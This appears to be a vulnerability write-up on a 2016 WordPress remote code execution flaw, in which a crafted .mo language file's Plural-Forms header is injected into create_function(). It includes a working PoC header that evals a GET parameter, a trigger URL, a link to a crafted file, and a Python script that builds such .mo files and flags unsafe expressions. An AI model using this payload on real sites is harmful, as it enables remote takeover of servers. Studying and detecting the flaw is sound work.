Created October 8, 2016 13:05
WordPress RCE via specially crafted .mo language file

The vulnerable code, in wp-includes/pomo/translations.php (the version of make_plural_form_function() that still used create_function()):

    function make_plural_form_function($nplurals, $expression) {
        // $expression comes straight from the Plural-Forms header of the .mo file;
        // every 'n' is turned into the PHP variable $n, nothing else is escaped.
        $expression = str_replace('n', '$n', $expression);
        $func_body = "
            \$index = (int)($expression);
            return (\$index < $nplurals)? \$index : $nplurals - 1;";
        // The body is compiled as PHP source, so whatever $expression contains is PHP source too.
        return create_function('$n', $func_body);
    }

PHP's create_function() wraps its body in a function definition and compiles that string with zend_eval_stringl(). Because $expression is spliced into $func_body unescaped, an attacker can use `}` to close the function body early; everything after the `}` is top-level code in the evaluated string and runs immediately, while the anonymous function is being created, and a trailing `/*` comments out the rest of the generated source (the original return statement and closing brace) so that it still compiles :-)

PoC (the Plural-Forms line of the .mo header, i.e. the translation of the empty msgid):

Plural-Forms: nplurals=1; plural=n);}eval($_GET[c]);/*;

Note that the payload contains no letter `n`, so str_replace('n', '$n', ...) leaves it intact; WordPress's header regex expects the `nplurals=N; plural=...` shape and strips the trailing `;` before the expression reaches make_plural_form_function().

I provide a crafted .mo language file (link below). Set the site's default language to Chinese so that WordPress loads it, then request the following URL and phpinfo() is executed:

/index.php?c=phpinfo();

The crafted .mo language file: https://drive.google.com/file/d/0ByqJ6Vtb_VsYbkw5U0F4QzBrUnM
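To make the mechanism above concrete, here is an added example (my own code, not the gist author's or WordPress's) that builds a little-endian GNU .mo catalog carrying an arbitrary Plural-Forms header, reads the header back the way WordPress's `nplurals=N; plural=...` regex does, prints the PHP source that the pre-fix make_plural_form_function() would hand to create_function() for it, and flags expressions that fall outside a character whitelist. The whitelist and the function names are this example's own assumptions; the `__lambda_func` wrapper name is what PHP's create_function() used internally. The sample headers are constructed here, one being the PoC line from this write-up.

```python
"""Added example (not WordPress code): build and vet a GNU .mo catalog whose
Plural-Forms header carries an arbitrary expression, and show the PHP source
that the pre-fix make_plural_form_function() hands to create_function()."""
import re
import struct

MO_MAGIC_LE = 0x950412DE  # .mo magic number in little-endian byte order
# Same shape as WordPress's header regex: nplurals=N; plural=<expression>
PLURAL_HEADER_RE = re.compile(r'^\s*nplurals\s*=\s*(\d+)\s*;\s+plural\s*=\s*(.+)$')
# Whitelist used by this example (an assumption, not WordPress's grammar):
# a gettext plural expression needs only n, digits, spaces and C comparison,
# logical and ternary operators.  '}', '$', ';' and '/' have no business there.
SAFE_EXPR_RE = re.compile(r'^[0-9n\s()?:<>=!%&|]+$')


def php_source_for_plural(nplurals, expression):
    """Reproduce the string the vulnerable function builds and that
    create_function() evaluates: it wraps $func_body as
    'function __lambda_func($n){...}' before calling zend_eval_stringl()."""
    expression = expression.replace('n', '$n')  # str_replace('n', '$n', ...)
    body = (
        "\n            $index = (int)(%s);"
        "\n            return ($index < %d)? $index : %d - 1;"
    ) % (expression, nplurals, nplurals)
    return "function __lambda_func($n){%s}" % body


def build_mo(entries):
    """Serialise {msgid: msgstr} as a little-endian .mo with an empty hash
    table.  The catalog header is the msgstr of the empty msgid."""
    keys = sorted(entries)  # gettext requires the originals to be sorted
    n = len(keys)
    orig_table_off = 7 * 4
    trans_table_off = orig_table_off + 8 * n
    hash_table_off = trans_table_off + 8 * n  # hash size 0, strings start here
    originals = [k.encode('utf-8') for k in keys]
    translations = [entries[k].encode('utf-8') for k in keys]
    pos, descriptors = hash_table_off, []
    for s in originals + translations:  # each string is NUL-terminated
        descriptors.append((len(s), pos))
        pos += len(s) + 1
    out = struct.pack('<7I', MO_MAGIC_LE, 0, n, orig_table_off,
                      trans_table_off, 0, hash_table_off)
    for length, off in descriptors:
        out += struct.pack('<II', length, off)
    for s in originals + translations:
        out += s + b'\x00'
    return out


def parse_mo(blob):
    """Read a little-endian .mo back into {msgid: msgstr}."""
    magic, _rev, n, o_off, t_off, _hsize, _h_off = struct.unpack_from('<7I', blob, 0)
    if magic != MO_MAGIC_LE:
        raise ValueError('not a little-endian .mo file')
    catalog = {}
    for i in range(n):
        olen, ooff = struct.unpack_from('<II', blob, o_off + 8 * i)
        tlen, toff = struct.unpack_from('<II', blob, t_off + 8 * i)
        catalog[blob[ooff:ooff + olen].decode('utf-8')] = blob[toff:toff + tlen].decode('utf-8')
    return catalog


def plural_forms_from_mo(blob):
    """Return (nplurals, expression) as WordPress derives it from the
    'Plural-Forms:' header line, trailing ';' stripped.  (WordPress also
    rewrites ?: into a parenthesised form; that step does nothing for
    expressions without '?' and is omitted here.)"""
    header = parse_mo(blob).get('', '')
    for line in header.splitlines():
        name, sep, value = line.partition(':')
        if sep and name.strip().lower() == 'plural-forms':
            m = PLURAL_HEADER_RE.match(value)
            if m:
                return int(m.group(1)), m.group(2).strip().rstrip(';')
    return 2, 'n != 1'  # WordPress's fallback when the header is unusable


def is_safe_plural_expression(expression):
    return bool(SAFE_EXPR_RE.match(expression))


def vet(blob):
    """Return (nplurals, expression, safe) for a .mo blob."""
    nplurals, expr = plural_forms_from_mo(blob)
    return nplurals, expr, is_safe_plural_expression(expr)


# Constructed samples: the PoC header from this write-up and a benign one.
EVIL_HEADER = "Plural-Forms: nplurals=1; plural=n);}eval($_GET[c]);/*;\n"
BENIGN_HEADER = "Plural-Forms: nplurals=2; plural=(n != 1);\n"

if __name__ == '__main__':
    for header in (EVIL_HEADER, BENIGN_HEADER):
        blob = build_mo({'': header, 'Hello': 'Hallo'})
        nplurals, expr, safe = vet(blob)
        print('safe' if safe else 'FLAGGED', repr(expr))
        if not safe:
            print(php_source_for_plural(nplurals, expr))
```

Running it prints the generated PHP for the PoC header, in which `$index = (int)($n);}` closes the function and `eval($_GET[c]);` sits at top level of the evaluated string, followed by `/*` swallowing the rest. The `vet()` routine is the kind of check a hardened loader would apply before ever compiling a plural expression; WordPress itself later dropped create_function() here in favour of a real expression parser (the Plural_Forms class in wp-includes/pomo/plural-forms.php), and create_function() was deprecated in PHP 7.2 and removed in PHP 8.0.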
